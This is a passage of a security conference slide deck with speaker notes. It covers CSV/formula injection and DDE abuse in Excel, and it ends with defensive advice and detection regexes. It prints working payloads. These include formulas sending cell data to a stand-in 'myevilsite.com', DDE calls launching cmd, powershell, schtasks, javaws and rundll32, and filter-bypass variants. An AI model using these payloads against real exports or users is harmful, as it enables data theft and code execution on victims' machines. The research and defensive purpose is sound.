  • 12. 12 Excel file format XLSX vs XLS vs CSV • Sometimes user can influence format, recall f=xls → f=csv • CSV: no Protected View warning • CSV: can’t contain start-up prompt auto-update setting CSV format in XLS file • Less likely outcome – one of those wacky variations! • Format warning instead of Protected View warning • Formal security warnings (1) and (2a) not shown • Therefore file cannot be not “trusted” in the registry • Curiously CSV format not supported: tab or CRLF cell delimiter
  • 13. 13 That CMD.EXE warning Built-in Excel functions • Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here") • Limited info about the system e.g. current directory =INFO("DIRECTORY"), Excel version =INFO("RELEASE") • =WEBSERVICE(URL) • Sadly doesn’t support authentication (i.e. force NTLM authentication) • Or file paths (local or UNC) or file:// • But it will steal data without user interaction (unlike HYPERLINK) =WEBSERVICE("http://myevilsite.com/?data="&A1) • =FILTERXML(XML, XPATH) • Any XXE or parsing bugs?
  • 14. 14 Alternatives to cmd.exe • =powershell|'Test-Connection 127.0.0.1'!A0 Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula =cmd|'/k powershell Test-Connection 127.0.0.1'!A0 • PATHEXT environment variable ignored – .exe only • .exe files in PATH where filename <= 12 characters =explorer|'https://nccgroup.trust'!A0 =schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0 =javaws|'http://myevilsite.com/malware.jnlp'!A0 =rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0 • N.B. if Excel is 32-bit, then the program will be run as such, etc.
  • 15. 15 Native DDE services – 1/2 Tcl (Tool Command Language) • dde services "" "" {Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}} {Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN} Demo • Commands you just saw dde request excel Sheet1 r1c1:r2c3 dde execute excel Sheet1 {[formula("overwrite","r1c1")]} dde execute excel Sheet1 {[file.delete("e:test")]} dde execute excel Sheet1 {[alert("hello")][alert("world")]} • Shame this doesn’t work  dde execute excel Sheet1 {[exec("c:windowssystem32calc.exe")]}
  • 16. 16 Native DDE services – 2/2 Progman • dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]} Folders (=Shell?) • dde execute Folders AppProperties {[ViewFolder("","attacker_IPc$",2)]} What about in Excel? • This could save you hours: when testing, if Excel hangs, try closing Tcl • =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}'  • That Tcl service-topic list isn’t complete…
  • 17. 17 DDESpy • Part of Visual Studio 6 (!) • Must be running when application launches
  • 18. 18 iexplore DDE • =iexplore|WWW_OpenURL!exploresecurity.com • No (3) “remote data not accessible” warning • Slice of BeEF anyone? • =iexplore|WWW_OpenURL!'<attacker_IP>c$' • =iexplore|WWW_OpenURL!'c:windowssystem32cmd.exe' • No better than where we were really! • No obvious way to include switches anyway – a limitation of file://
  • 19. 19 firefox DDE • =firefox|WWW_OpenURL!exploresecurity.com  =firefox|WWW_OpenURL!'http://exploresecurity.com'  =firefox|WWW_OpenURL!'http://exploresecurity.com/'  • =firefox|WWW_GetWindowInfo!foo
  • 20. 20 Demo (1) No Protective View warning as CSV (2) Just “Enable Content” warning as DDE call succeeded • Background navigation to phishing site could be very effective (3) No warnings – exactly which stars were aligned there?! • A file with same name previously downloaded • Had content to elicit warnings, which were accepted • So it’s now “trusted” • Previous file need not have been malicious – remember =NotASheet!A1 • Malicious file’s start-up prompt set to auto-update links
  • 21. 21 Bypassing filters • Original article stated prefix cells starting with = with ' • This will “cast” the cell as text in XLS[X] and stop execution in CSV • We know better now • Imagine the blacklist ^=[A-Za-z].* • How about: +cmd|'/k ipconfig'!A0-cmd|'/k ipconfig'!A0 =cmd|'/k ipconfig'!A0 @SUM(cmd|'/k ipconfig'!A0) "=cmd|'/k ipconfig'!A0" ""=cmd|'/k ipconfig'!A0 =(cmd|'/k ipconfig'!A0) =0-cmd|'/k ipconfig'!A0
  • 22. 22 Lessons • Check out any Excel export that returns user-supplied data • CSV is not a benign format • DDE ≠ macro • Input validation blacklists may not be robust • Much of this stuff applies to red-teaming • Excel documents as email attachments • In some cases it may be possible to cut down the Excel warnings • Excel may have more to give in this area • The old stuff often comes back to bite us! • Work in progress – do explore...
  • 23. 23 Where now? • Enumerate DDE surface area – services + topics + items • Poorly documented • iexplore c:WindowsSystem32ieframe.dll • firefox c:Program Files (x86)Mozilla Firefoxxul.dll • Progman/Shell/Folders c:WindowsSystem32shell32.dll • Progman/Shell/Folders attractive as they’re always running • But are they exploitable via Excel? • dde execute Folders AppProperties {[ViewFolder("","c:windows",1)]} • =Folders|AppProperties!'{[ViewFolder("","c:windows",1)]}' • =iexplore|WWW_OpenURL!'exploresecurity.com?a={[ViewFolder("","c:win dows",1)]}' → http://www.exploresecurity.com/?a=ViewFolder • =firefox|WWW_OpenURL!'http://exploresecurity.com?a={[ViewFolder(""," c:windows",1)]}' → http://exploresecurity.com/?a={[ViewFolder( • =cmd|'/k echo {[ViewFolder("","c:windows",1)]}'!A0 → {[ViewFolder("","c:windows",1)]}
  • 24. 24 The R&D brick wall Or this? Is it because of this?
  • 25. 25 Defence • Blacklists can be difficult to get right – this should not be a new lesson! • Validation against a strict whitelist of “known good” should always be the go- to defensive strategy • Consider length, character types, format • Otherwise e.g. for XLS[X] consider always prefixing user input with ' • This may break some numerical operations on those cells but if you’re expecting a number then see above! • Trouble with ' for CSV is that it’s visible • If you have to use a blacklist, don’t be too strict • In the vast majority of cases, “normal” input still won’t match, e.g. (and I hate to do it  but people have asked) ^W.+|.+!.+ // DDE ^W.+(.+) // formulae Use at your own risk and they’ll probably change one day!
  • 26. 26 Fin Any questions? exploresecurity.com @exploresecurity jeromesmith.uk @MrJeromeSmith Tip of the hat to… James @albinowax Cara @bones_codes Michael Roberts Andy @ZephrFish Raquel Alvarez

Editor's Notes

  1. See next slide, but also… HTTP y param possibly reflected back – header and body “Jerome” presumably manipulable (profile first name etc.) Header disclosure ASP.NET 4.0 unsupported
  2. Format change – especially if using libraries, unintended functions supported Incorrect content-type could yield XSS but spoiled by Content-Disposition Cache-control Report may include sensitive data May not be cached due to other headers like Content-Disposition (without this Content-Type plays a role – in this case it would be cached due to text/html but application/vnd.ms-excel for .xls or application/vnd.openxmlformats-officedocument.spreadsheetml.sheet for xlsx less certain – browser-dependent) Even apps that have good caching headers can fall down on file download (these requests not processed in same way, e.g. it’s a static file returned by server)
  3. James Kettle, PortSwigger DDE call Cell reference is not required, could be anything (cells are used when data source is another Excel sheet) Imagine program=shares topic=LSE item=NCC It’s because the DDE call fails that Excel offers to run it Orange/EE definitely blocks outbound 135 and 139 (and probably 25 and 445) If internal app, those creds immediately valuable
  4. (1) because it’s come from internet location (2a) first encounter – creates registry entry to be “trusted” (2b) when trusted but links not auto-updated (3) because DDE call fails More warnings may follow after payload launches
  5. Piranha jobs where users had to accept Excel warning(s) % of users who opened the spreadsheet Clearly we didn’t know what the user experience was in terms of warnings but the fact there was a difference between opened spreadsheets and macros run shows that some further step must have been necessary Internal Excel files often contain macros, especially within areas such as finance – users are habituated to the warnings Or the warnings may have been disabled! This is the macro setting, doesn’t affect us here, but that’s worse!
  6. Only once the Enable Content warning has been accepted does this setting make a difference =NotASheet!A1 is enough to prompt Enable Content security warning but doesn’t do anything suspicious Might as well hit them with once if they’re accepting the warning Trust Center https://support.office.com/en-gb/article/Block-or-unblock-external-content-in-Office-documents-10204ae0-0621-411f-b0d6-575b0847a795 Workbook Links = links to data in another workbook https://support.microsoft.com/en-us/kb/826921
  7. Part of Trust Center but not visible through the UI Entry in registry doesn’t require users to save the file Protected View approval registered immediately Enable content approval registered once CMD warning answered (can be “no”) Binary value? Trusted Locations are default areas, nothing useful without prior access Attack scenario: user input influences filename or application always names the file the same way Browsers may be configured to auto-download in which case they will append numbers to stop accidental overwrite  If no filename in Content-Disposition then FF will name file by the page in the URI + an extension based on Content-Type e.g. export.asp.xls so this would produce same filename
  8. Although CSV no PV, the EC warning means it can be trusted in registry Invalid XLSX not tolerated Excel 2010 vs 2013 no real difference URI extension: doesn’t matter if request is for .xls or .asp etc Content-Type / Content-Disposition filename dominant But text/csv not recognised so only if URI is .csv will it be opened correctly, otherwise .asp will fail Document opened inline vs saved & opened from disk If inline, URI must end CSV, otherwise similar to above Invalid XLS format =cmd|'/k ipconfig'!A3 okay 1 2 3 =cmd|'/k ipconfig'!A3 okay 1 2 3 =cmd|'/k ipconfig'!A3 okay 1,2,3,=cmd|'/k ipconfig'!A3 not okay
  9. Can we get rid of or soften that CMD.EXE warning?
  10. Tried =powershell in Excel 2010 (32-bit), 2013 (32-bit), 2016 (64-bit) @ZephrFish doesn’t see this (!?) but if it can happen then it’s still something to wary of Tilde means next character is a literal e.g. in Find, but can’t be escaped in formula with ~~ or \~ etc ??? Not many files have 8.3 alternative anyway Find files < 8 chars plus .exe by powershell "cmd /c dir *.exe /b |? {$_.length -lt 13}" explorer will open default browser Java Web Start – may be disabled anyway but fun!
  11. Data theft from sheet a little alarming, although something malicious would already have to be running You can overwrite cells of the spreadsheet that you can’t using the web app injection Use of Alert vs MsgBox -> XLM macro language in Excel 4.0 before VBA (old help file in reference at end) Alert also demonstrates multiple statements i.e. [macro 1][macro 2] Exec didn’t work  or fopen The System topic seems to do same as Sheet but unexplored
  12. Documentation on DDE interfaces poor – Googling so much, Google thought I was a robot! Progman manipulates shortcuts in Start | All Programs Screenshot of typing “word” into Start search menu Can’t delete real Microsoft Word 2010 as link is in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office” Folders instructs Windows Explorer (Shell seems to mirror Folders) The “2” minimises the window Doesn’t accept URL Clear out DDE channels from Excel https://social.technet.microsoft.com/Forums/office/en-US/7c8f845d-c4aa-4627-9008-3251d2772536/dde-links-crash-excel-2010-on-windows-7-64bits?forum=excel Dim i, ChannelNumber As Integer For i = 1 To 1000 Application.DDETerminate (i) Next i
  13. Only works if IE running
  14. Trailing / after domain important Note that only URL of active tab obtained WWW_GetWindowInfo doesn’t work in IE Another reason to keep session tokens etc. out of URLs
  15. Top left picked up – others pass The @ was originally an alias for = to make life easy for converts from Lotus Notes SUM could also be COUNT, COS… Some may only work when in file and opened, not copy & paste, as Excel corrects syntax to make it work!
  16. If something in Tcl doesn’t work in Excel, useless Syntax of DDE not needed elsewhere? Is it Excel limitation?... iexplore/firefox tests iexplore only chars associated with URLs like : / ? . % passed through (suggests IE filtering DDE input) Confirmed by difference with Firefox cmd test everything came through But that’s not a “real” DDE call Also special characters in topic here, cf item in iexplore – difference (you’d think item would be more open)?
  17. Image from https://images.template.net/wp-content/uploads/2014/10/Free-brick-wall-texture.jpg All available textures for free download come under the ambit of Creative Commons Usage Based on http://www.texturemate.com/content/free-texture-brick-25-05-2014-00005-img0871 Every resource provided on texturemate is considered completely royalty free! The stock textures, texture packs, brush packs, and any other resources available for download on this site are completely free and may be used in commercial or non-commercial applications. Credit to texturemate for use of available textures or brushes is appreciated, but not required
  18. Consider phone number – it may have a + at the front but so structured elsewhere that it can be well protected Prefixing with ' may break some numerical operations on that cell e.g. SUM but if you’re expecting a number then use whitelist; text functions should still work Blacklist regex – you asked for it! Regexes could be combined but harder to match literals | only with ! and ( only with ) – nothing wrong with clarity! \W (capital) matches non-alphanumeric Formulae is probably more prone to false positives